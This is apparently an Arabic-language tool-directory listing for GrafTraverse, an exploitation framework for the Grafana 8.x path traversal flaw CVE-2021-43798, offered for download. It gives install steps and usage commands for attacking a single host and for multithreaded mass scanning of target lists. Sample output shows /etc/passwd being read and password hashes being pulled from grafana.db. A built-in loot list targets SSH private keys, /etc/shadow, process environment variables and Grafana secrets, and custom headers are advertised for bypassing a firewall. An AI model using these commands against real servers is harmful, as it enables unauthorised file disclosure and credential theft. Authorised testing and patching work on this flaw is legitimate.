Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
GrafTraverse-CVE-2021-43798 — CVE-2021-43798 MiNi Exploitation Framework | Kitploit
أدوات/GitHubGitHub/asbawy/graftraverse-cve-2021-43798
كسر كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHubasbawy/graftraverse-cve-2021-43798

GrafTraverse-CVE-2021-43798

CVE-2021-43798 MiNi Exploitation Framework

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

GrafTraverse - CVE-2021-43798 إطار استغلال MiNi

أداة أتمتة سطر أوامر للاختبار الأمني المصرح به لثغرة اجتياز الدليل في Grafana (CVE-2021-43798).


نظرة عامة

Banner

CVE-2021-43798 هي ثغرة اجتياز دليل غير مصادق عليها في Grafana 8.x تسمح للمهاجمين بقراءة ملفات عشوائية على نظام الملفات الأساسي عبر نقطة النهاية /public/plugins/. السبب الجذري هو عدم تنقية المسار بشكل صحيح على طلبات أصول الإضافات، مما يتيح لتسلسلات ../ الهروب من الدليل المقصود.

GrafTraverse هي إعادة كتابة كاملة للإثبات المفاهيمي الأصلي. تصلح أخطاء حاسمة في معالجة الطلبات، وتضيف فحصًا متعدد الخيوط للدفعات، واكتشافًا تلقائيًا للإضافات، واستخراج بيانات الاعتماد، وإعداد تقارير منظمة — مما يجعلها أداة من الدرجة الإنتاجية لفرق الاختبارات الأمنية واختبار الاختراق.


المميزات


التثبيت

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/asbawy/GrafTraverse.git
cd GrafTraverse

# تأكد من توفر requests (مثبتة مع Kali)
pip3 install requests

# اجعله قابلاً للتنفيذ
chmod +x GrafTraverse.py

الاستخدام

يستخدم GrafTraverse واجهة سطر أوامر قائمة على الأوامر الفرعية. تدعم جميع الأوامر --help.

1. هدف فردي تفاعلي

إطلاق القائمة التفاعلية ضد مضيف واحد:

root@kitploit:~
python3 GrafTraverse.py single -u http://IP:PORT
root@kitploit:~
============================================================
 INTERACTIVE MODE
============================================================
 1. /etc/passwd
 2. grafana.ini
 3. grafana.db
 4. Custom path
 5. Full automated loot
 6. Scan plugins
 7. Exit
============================================================

2. فحص الإضافات

تحديد سريع لنقطة نهاية الإضافة المعرضة للخطر دون استغلال:

root@kitploit:~
python3 GrafTraverse.py scan -u http://target:PORT

3. المسح الجماعي

تحميل الأهداف من ملف ومعالجتها بشكل متزامن:

root@kitploit:~
python3 GrafTraverse.py batch -l targets.txt --workers 10 --csv results.csv

تنسيق targets.txt:

root@kitploit:~
http://192.168.1.10:3000
http://192.168.1.11:3000
https://grafana.target.com
# الأسطر التي تبدأ بـ # يتم تجاهلها

4. تعداد باستخدام قائمة الكلمات

تغذية قائمة ملفات مخصصة لاجتياز عميق:

root@kitploit:~
python3 GrafTraverse.py single -u http://target:3000   --wordlist sensitive_files.txt   --output-dir ./loot   --json log.json

5. الوكيل والرؤوس المخصصة

توجيه حركة المرور عبر Burp Suite وإضافة رؤوس مخصصة:

root@kitploit:~
python3 GrafTraverse.py single -u http://target:3000   --proxy http://127.0.0.1:8080   -H "X-Forwarded-For: 127.0.0.1"   -H "Authorization: Bearer eyJ0..."

مرجع الأوامر

single

batch

العلمالوصف
-l, --listملف يحتوي على روابط الأهداف (مطلوب)
--workersالخيوط المتزامنة (افتراضي: 5)
(جميع أعلام single مدعومة)

scan

العلمالوصف
-u, --urlURL الهدف (مطلوب)
(جميع أعلام الشبكة مدعومة)

مثال على الإخراج

استرجاع ملف ناجح

root@kitploit:~
[+] Output: 20260526_GrafTraverse
[*] Testing: /etc/passwd (via alertlist)
[+] SUCCESS: /etc/passwd (1874 bytes)

------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
------------------------------------------------------------

[+] Saved: 20260526_GrafTraverse/http___10.129.234.47_3000_passwd

استخراج تجزئة قاعدة بيانات Grafana

root@kitploit:~
[*] Testing: /var/lib/grafana/grafana.db (via alertlist)
[+] SUCCESS: /var/lib/grafana/grafana.db (98304 bytes)
[+] Saved: 20260526_GrafTraverse/http___10.129.234.47_3000_grafana.db
[*] Extracted 3 password hashes:
    admin:PBKDF2$sha256$10000$...base64...
    editor:PBKDF2$sha256$10000$...base64...
    viewer:PBKDF2$sha256$10000$...base64...

الملفات المستهدفة (الغنيمة التلقائية)

تسلسل الغنيمة المدمج يحاول استرجاع الملفات التالية بالترتيب:


الإصدارات المتأثرة

  • Grafana 8.0.0 إلى 8.3.0
  • تم التصحيح في 8.3.1 و 7.5.12
تنزيل الأداة
الميزةالوصف
هجوم القوة العمياء متعدد الإضافاتيستكشف تلقائيًا أكثر من 40 إضافة مدمجة للعثور على مسار ضعيف
الوضع التفاعليوضع قائم على القوائم لاستغلال هدف واحد مع معاينة حية للملفات
وضع الدفعةمسح متزامن لأهداف متعددة مع عمال خيوط قابلة للتكوين
وضع قائمة الكلماتتعداد عميق للملفات باستخدام قوائم كلمات مخصصة
استخراج التجزئة تلقائيًايستخرج تلقائيًا تجزئات كلمات المرور PBKDF2 من قاعدة البيانات grafana.db التي تم تنزيلها
التسجيل المنظمتصدير النتائج إلى JSON و CSV لتقارير سلسة
دعم الوكيلتوجيه حركة المرور عبر Burp أو ZAP أو أي وكيل HTTP (--proxy)
رؤوس مخصصةإدراج رؤوس عشوائية لتجاوز جدار الحماية أو رموز المصادقة (-H)
تخصيص الاجتيازتجاوز عمق الاجتياز الافتراضي للبيئات غير القياسية (--depth)
التصفية الذكيةيزيل النتائج الإيجابية الكاذبة برفض استجابات JS/CSS/HTML للإضافات
بدون تبعياتيتطلب فقط requests (مثبت مسبقًا على Kali / Parrot)
العلمالوصف
-u, --urlURL الهدف (مطلوب)
--no-downloadوضع العرض فقط، لا تحفظ الملفات
-t, --timeoutمهلة الطلب بالثواني (افتراضي: 10)
--proxyرابط وكيل HTTP/HTTPS
-H, --headerرأس مخصص (قابل للتكرار)
--depthسلسلة الاجتياز (افتراضي: ../../../../../../../../)
--output-dirدليل لحفظ الملفات المسترجعة
--jsonإلحاق النتائج بملف سجل JSON
--csvإلحاق النتائج بملف سجل CSV
--wordlistملف يحتوي على مسارات للتعداد
--pluginفرض اسم إضافة معين
الملفالنوعالحساسية
/etc/passwdنصتعداد المستخدمين
/etc/shadowنصتجزئات كلمات المرور (نادرًا ما يُقرأ)
/etc/hostsنصطوبولوجيا الشبكة
/etc/hostnameنصتحديد المضيف
/etc/grafana/grafana.iniنصأسرار Grafana وبيانات اعتماد قاعدة البيانات
/var/lib/grafana/grafana.dbثنائيقاعدة بيانات SQLite تحتوي على تجزئات المستخدمين ومفاتيح API
/var/log/grafana/grafana.logنصاستخبارات تشغيلية
/root/.ssh/id_rsaنصمفتاح SSH خاص
/root/.ssh/authorized_keysنصتعيين الوصول القائم على المفاتيح
/proc/self/environنصمتغيرات بيئة العملية
/proc/self/cmdlineنصوسائط العملية
/proc/versionنصإصدار النواة
/proc/mountsنصتخطيط نظام الملفات
/etc/os-releaseنصتعريف نظام التشغيل
/etc/issueنصتعريف نظام التشغيل
/etc/crontabنصالمهام المجدولة
/etc/resolv.confنصتكوين DNS